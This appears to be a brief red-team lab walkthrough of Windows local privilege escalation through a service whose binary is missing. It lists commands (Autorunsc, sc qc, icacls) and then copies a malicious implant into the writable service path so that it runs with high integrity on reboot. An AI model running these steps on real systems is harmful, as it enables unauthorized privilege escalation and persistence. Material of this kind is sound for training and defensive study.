First: Let’s try to find missing services

Autorunsc64.exe -a s | more

Second: Take a look at the service configuration

sc qc AdobeUpdate

Please Notice that that service should use this binary however that binary is not their

Third: Let’s check if we have write access to that folder

icacls C:\RTO\bin

And we got modified access

Fourth: Copy our malicious service to that path

copy C:\Users\IEUser\Desktop\LPE\implant\implantsrv.exe C:\RTO\bin\AdobeUpdate.exe

Now on the reboot, the service will start with high-integrity access